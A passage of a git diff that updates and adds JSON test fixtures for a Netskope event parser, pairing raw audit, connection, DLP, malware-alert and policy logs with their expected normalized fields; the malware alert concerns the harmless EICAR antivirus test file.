     "message": "{\n  \"timestamp\": 1651451341,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"john.doe@example.org\",\n  \"severity_level\": 2,\n  \"audit_log_event\": \"Deleted inline policy\",\n  \"supporting_data\": {\n    \"data_type\": \"policy\",\n    \"data_values\": [\n      false\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
+      "action": "Allow",
       "category": [
         "configuration"
       ],
diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
index 79f08033a..10b406a5f 100644
--- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
+++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
@@ -5,6 +5,7 @@
   "expected": {
     "message": "{\n  \"timestamp\": 1651489787,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"john.doe@example.org\",\n  \"severity_level\": 1,\n  \"audit_log_event\": \"Edit admin record\",\n  \"supporting_data\": {\n    \"data_type\": \"admin\",\n    \"data_values\": [\n      \"admin@example.org\"\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
+      "action": "Allow",
       "category": [
         "configuration"
       ],
diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json
index 8a05a5c15..8a792a408 100644
--- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json
+++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json
@@ -5,6 +5,7 @@
   "expected": {
     "message": "{\n  \"timestamp\": 1651494031,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"student13\",\n  \"severity_level\": 1,\n  \"audit_log_event\": \"Login Failed\",\n  \"supporting_data\": {\n    \"data_type\": \"user\",\n    \"data_values\": [\n      \"4.5.6.7\",\n      \"student13\"\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"student13\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
+      "action": "Allow",
       "category": [
         "authentication"
       ],
diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json
index 1b4d67977..01549d366 100644
--- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json
+++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json
@@ -5,6 +5,7 @@
   "expected": {
     "message": "{\n  \"timestamp\": 1671727087,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"john.doe@example.org\",\n  \"severity_level\": 2,\n  \"audit_log_event\": \"Login Successful\",\n  \"supporting_data\": {\n    \"data_type\": \"user\",\n    \"data_values\": [\n      \"1.2.3.4\",\n      \"john.doe@example.org\"\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
+      "action": "Allow",
       "category": [
         "authentication"
       ],
diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json
index 8b4635920..12e39be95 100644
--- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json
+++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json
@@ -5,6 +5,7 @@
   "expected": {
     "message": "{\n  \"timestamp\": 1670409967,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"john.doe@example.org\",\n  \"severity_level\": 2,\n  \"audit_log_event\": \"Logout Successful\",\n  \"supporting_data\": {\n    \"data_type\": \"reason\",\n    \"data_values\": [\n      \"Logged out due to inactivity\"\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
+      "action": "Allow",
       "category": [
         "authentication"
       ],
diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json
index b06db05ac..a2fa885de 100644
--- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json
+++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json
@@ -5,6 +5,7 @@
   "expected": {
     "message": "{\n  \"timestamp\": 1651489787,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"john.doe@example.org\",\n  \"severity_level\": 1,\n  \"audit_log_event\": \"Password Change Successful\",\n  \"supporting_data\": {\n    \"data_type\": \"user\",\n    \"data_values\": [\n      \"1.2.3.4\",\n      \"admin@example.org\"\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
+      "action": "Allow",
       "category": [
         "iam"
       ],
diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json
index 29f3c0723..5c5218356 100644
--- a/Netskope/netskope_events/tests/test_connection_log.json
+++ b/Netskope/netskope_events/tests/test_connection_log.json
@@ -5,6 +5,7 @@
   "expected": {
     "message": "{\n  \"_id\": \"69573873d4de0a4f1d2cbac4\",\n  \"access_method\": \"Client\",\n  \"app\": \"Swile\",\n  \"appcategory\": \"HR\",\n  \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n  \"bypass_traffic\": \"yes\",\n  \"category\": \"HR\",\n  \"cci\": 16,\n  \"ccl\": \"poor\",\n  \"connection_id\": 0,\n  \"count\": 1,\n  \"domain\": \"test.example.org\",\n  \"dst_country\": \"FR\",\n  \"dst_geoip_src\": 1,\n  \"dst_latitude\": 48.85836410522461,\n  \"dst_location\": \"Paris\",\n  \"dst_longitude\": 2.294532060623169,\n  \"dst_region\": \"Ile-de-France\",\n  \"dst_timezone\": \"Europe/Paris\",\n  \"dst_zipcode\": \"N/A\",\n  \"dstip\": \"5.6.7.8\",\n  \"dstport\": 443,\n  \"netskope_pop\": \"FR-PAR1\",\n  \"organization_unit\": \"\",\n  \"other_categories\": [\n    \"Finance/Accounting\",\n    \"All Categories\",\n    \"HR\"\n  ],\n  \"page\": \"test.example.org\",\n  \"policy\": \"bypass_ssl for regulation purpose\",\n  \"request_id\": 1111111111111111111,\n  \"site\": \"Swile\",\n  \"src_country\": \"FR\",\n  \"src_geoip_src\": 2,\n  \"src_latitude\": 48.11,\n  \"src_location\": \"Rennes\",\n  \"src_longitude\": -1.6744,\n  \"src_region\": \"Brittany\",\n  \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n  \"src_timezone\": \"Europe/Paris\",\n  \"src_zipcode\": \"35000\",\n  \"srcip\": \"4.5.6.7\",\n  \"ssl_decrypt_policy\": \"yes\",\n  \"timestamp\": 1671639140,\n  \"traffic_type\": \"CloudApp\",\n  \"transaction_id\": 0,\n  \"type\": \"connection\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"url\": \"test.example.org\",\n  \"user\": \"john.doe@example.org\",\n  \"user_generated\": \"yes\",\n  \"userip\": \"1.2.3.4\",\n  \"userkey\": \"john.doe@example.org\",\n  \"org\": \"\",\n  \"http_transaction_count\": 0,\n  \"network\": \"\",\n  \"useragent\": \"\",\n  \"dsthost\": \"\",\n  \"numbytes\": 0,\n  \"CononicalName\": \"\",\n  \"os_version\": \"\",\n  \"browser_session_id\": 0,\n  \"resp_cnt\": 0,\n  \"log_file_name\": \"\",\n  \"suppression_end_time\": 0,\n  \"browser_version\": \"\",\n  \"severity\": \"\",\n  \"client_bytes\": 0,\n  \"suppression_start_time\": 0,\n  \"app_session_id\": 0,\n  \"sAMAccountName\": \"\",\n  \"req_cnt\": 0,\n  \"device\": \"\",\n  \"browser\": \"\",\n  \"userPrincipalName\": \"\",\n  \"conn_endtime\": 1671639139,\n  \"conn_duration\": 3,\n  \"protocol\": \"\",\n  \"fromlogs\": \"\",\n  \"serial\": \"\",\n  \"resp_content_len\": 0,\n  \"dynamic_classification\": \"\",\n  \"hostname\": \"\",\n  \"os\": \"\",\n  \"server_bytes\": 0,\n  \"conn_starttime\": 1671639136,\n  \"sessionid\": \"\",\n  \"resp_content_type\": \"\"\n}\n",
     "event": {
+      "action": "Allow",
       "category": [
         "network"
       ],
diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json
index 66c901c90..37ab6e32b 100644
--- a/Netskope/netskope_events/tests/test_dlp_incident.json
+++ b/Netskope/netskope_events/tests/test_dlp_incident.json
@@ -30,7 +30,8 @@
       "hash": {
         "md5": "68b329da9893e34099c7d8ad5cb9c940"
       },
-      "mime_type": "eicar.txt"
+      "mime_type": "eicar.txt",
+      "size": 19154
     },
     "http": {
       "request": {
diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json
index 63497504d..5e5f6de15 100644
--- a/Netskope/netskope_events/tests/test_malware_alert.json
+++ b/Netskope/netskope_events/tests/test_malware_alert.json
@@ -5,7 +5,7 @@
   "expected": {
     "message": "{\n  \"_id\": \"882049056ee9e069c1c329b7\",\n  \"access_method\": \"Client\",\n  \"action\": \"Detection\",\n  \"activity\": \"Download\",\n  \"alert\": \"yes\",\n  \"alert_type\": \"Malware\",\n  \"app\": \"eicar\",\n  \"app_session_id\": 111111111111111111,\n  \"appcategory\": \"n/a\",\n  \"browser\": \"Safari\",\n  \"category\": \"n/a\",\n  \"cci\": \"\",\n  \"ccl\": \"unknown\",\n  \"connection_id\": 0,\n  \"count\": 1,\n  \"device\": \"Mac Device\",\n  \"dst_country\": \"US\",\n  \"dst_geoip_src\": 2,\n  \"dst_latitude\": 47.6711,\n  \"dst_location\": \"Redmond\",\n  \"dst_longitude\": -122.1253,\n  \"dst_region\": \"Washington\",\n  \"dst_timezone\": \"America/Los_Angeles\",\n  \"dst_zipcode\": \"98073\",\n  \"dstip\": \"5.6.7.8\",\n  \"file_path\": \"NA\",\n  \"file_size\": 308,\n  \"file_type\": \"File Type Not Detected\",\n  \"hostname\": \"MacBook Pro\",\n  \"instance\": null,\n  \"managementID\": \"99999999999999999999999999999999\",\n  \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n  \"mime_type\": \"\",\n  \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n  \"object\": \"eicarcom2.zip\",\n  \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n  \"object_type\": \"File\",\n  \"organization_unit\": \"\",\n  \"os\": \"Monterey\",\n  \"referer\": \"https://www.eicar.org/\",\n  \"request_id\": 2222222222222222222,\n  \"severity\": \"high\",\n  \"site\": \"eicar\",\n  \"src_country\": \"FR\",\n  \"src_geoip_src\": 2,\n  \"src_latitude\": 48.11,\n  \"src_location\": \"Rennes\",\n  \"src_longitude\": -1.6744,\n  \"src_region\": \"Brittany\",\n  \"src_timezone\": \"Europe/Paris\",\n  \"src_zipcode\": \"35000\",\n  \"srcip\": \"4.3.2.1\",\n  \"timestamp\": 1671631928,\n  \"title\": \"eicarcom2.zip\",\n  \"traffic_type\": \"CloudApp\",\n  \"transaction_id\": 3333333333333333333,\n  \"tss_mode\": \"inline\",\n  \"type\": \"nspolicy\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"url\": \"secure.eicar.org/eicarcom2.zip\",\n  \"user\": \"john.doe@example.org\",\n  \"user_id\": \"john.doe@example.org\",\n  \"userip\": \"1.2.3.4\",\n  \"userkey\": \"john.doe@example.org\",\n  \"dlp_file\": \"\",\n  \"data_center\": \"\",\n  \"browser_version\": \"\",\n  \"owner\": \"\",\n  \"dlp_incident_id\": 0,\n  \"channel_id\": \"\",\n  \"from_user_category\": \"\",\n  \"resp_cnt\": 0,\n  \"suppression_key\": \"\",\n  \"loginurl\": \"\",\n  \"total_collaborator_count\": 0,\n  \"os_version\": \"\",\n  \"dlp_rule\": \"\",\n  \"dlp_mail_parent_id\": \"\",\n  \"instance_id\": \"\",\n  \"to_user\": \"\",\n  \"suppression_end_time\": 0,\n  \"fromlogs\": \"\",\n  \"dlp_parent_id\": 0,\n  \"dstport\": 0,\n  \"dst_timezone\": \"\",\n  \"serial\": \"\",\n  \"audit_category\": \"\",\n  \"sha256\": \"\",\n  \"from_user\": \"\",\n  \"sAMAccountName\": \"\",\n  \"app_activity\": \"\",\n  \"useragent\": \"\",\n  \"netskope_activity\": \"\",\n  \"conn_duration\": 0,\n  \"other_categories\": [],\n  \"custom_connector\": \"\",\n  \"dlp_rule_severity\": \"\",\n  \"numbytes\": 0,\n  \"telemetry_app\": \"\",\n  \"true_obj_category\": \"\",\n  \"userPrincipalName\": \"\",\n  \"logintype\": \"\",\n  \"suppression_start_time\": 0,\n  \"browser_session_id\": 0,\n  \"dlp_profile\": \"\",\n  \"src_time\": \"\",\n  \"modified\": 0,\n  \"policy\": \"\",\n  \"policy_id\": \"\",\n  \"notify_template\": \"\",\n  \"audit_type\": \"\",\n  \"orignal_file_path\": \"\",\n  \"dlp_is_unique_count\": \"\",\n  \"org\": \"\",\n  \"user_category\": \"\",\n  \"dlp_unique_count\": 0,\n  \"exposure\": \"\",\n  \"netskope_pop\": \"\",\n  \"shared_with\": \"\",\n  \"client_bytes\": 0,\n  \"sanctioned_instance\": \"\",\n  \"device_classification\": \"\",\n  \"data_type\": \"\",\n  \"scan_type\": \"\",\n  \"internal_collaborator_count\": 0,\n  \"CononicalName\": \"\",\n  \"workspace\": \"\",\n  \"log_file_name\": \"\",\n  \"parent_id\": \"\",\n  \"true_obj_type\": \"\",\n  \"dlp_rule_count\": 0,\n  \"sessionid\": \"\",\n  \"workspace_id\": \"\",\n  \"page_site\": \"\",\n  \"universal_connector\": \"\",\n  \"server_bytes\": 0,\n  \"req_cnt\": 0,\n  \"file_lang\": \"\",\n  \"protocol\": \"\",\n  \"web_universal_connector\": \"\",\n  \"dsthost\": \"\",\n  \"appsuite\": \"\",\n  \"managed_app\": \"\",\n  \"page\": \"\"\n}\n",
     "event": {
-      "action": "Download",
+      "action": "Detection",
       "category": [
         "malware"
       ],
@@ -36,7 +36,8 @@
       "hash": {
         "md5": "68b329da9893e34099c7d8ad5cb9c940"
       },
-      "name": "eicarcom2.zip"
+      "name": "eicarcom2.zip",
+      "size": 308
     },
     "host": {
       "name": "MacBook Pro",
diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json
new file mode 100644
index 000000000..0d739d4fd
--- /dev/null
+++ b/Netskope/netskope_events/tests/test_nspolicy_block.json
@@ -0,0 +1,109 @@
+{
+  "input": {
+    "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Netskope",
+        "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}",
+    "event": {
+      "action": "block",
+      "category": [
+        "network"
+      ],
+      "dataset": "nspolicy",
+      "duration": 0,
+      "kind": "alert",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-14T09:01:32Z",
+    "destination": {
+      "address": "1.2.3.4",
+      "bytes": 0,
+      "geo": {
+        "city_name": "San Francisco",
+        "country_iso_code": "US",
+        "location": {
+          "lat": 37.775699615478516,
+          "lon": -122.39520263671875
+        },
+        "postal_code": "N/A",
+        "region_name": "California",
+        "timezone": "America/Los_Angeles"
+      },
+      "ip": "1.2.3.4"
+    },
+    "host": {
+      "name": "PC-HOST01",
+      "os": {
+        "name": "Windows 11",
+        "platform": "windows",
+        "type": "windows",
+        "version": "Windows NT 11.0"
+      }
+    },
+    "netskope": {
+      "events": {
+        "access_method": "Client",
+        "application": {
+          "category": "General",
+          "name": "DNS Over HTTPS"
+        },
+        "ccl": "unknown"
+      }
+    },
+    "network": {
+      "bytes": 0
+    },
+    "observer": {
+      "vendor": "Netskope"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ],
+      "user": [
+        "john.doe"
+      ]
+    },
+    "rule": {
+      "id": "99999999999999999999999999999999 2024-10-30 13:52:18.401518",
+      "name": "Block DoH - incompatibility with Netskope"
+    },
+    "source": {
+      "address": "5.6.7.8",
+      "bytes": 0,
+      "geo": {
+        "city_name": "Paris",
+        "country_iso_code": "FR",
+        "location": {
+          "lat": 48.8323,
+          "lon": 2.4075
+        },
+        "postal_code": "75018",
+        "region_name": "\u00cele-de-France",
+        "timezone": "Europe/Paris"
+      },
+      "ip": "5.6.7.8"
+    },
+    "url": {
+      "original": "test.example.com",
+      "path": "test.example.com"
+    },
+    "user": {
+      "domain": "mail.fr",
+      "email": "john.doe@mail.fr",
+      "name": "john.doe"
+    },
+    "user_agent": {
+      "name": "Chrome"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json
index 25513a172..d0d9ed304 100644
--- a/Netskope/netskope_events/tests/test_nspolicy_log.json
+++ b/Netskope/netskope_events/tests/test_nspolicy_log.json
@@ -43,7 +43,8 @@
         "md5": "68b329da9893e34099c7d8ad5cb9c940"
       },
       "mime_type": "image/gif",
-      "name": "giphy2.gif"
+      "name": "giphy2.gif",
+      "size": 204299
     },
     "host": {
       "name": "TEST-1111111",
diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json
new file mode 100644
index 000000000..b05f61a9d
--- /dev/null
+++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json
@@ -0,0 +1,120 @@
+{
+  "input": {
+    "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; 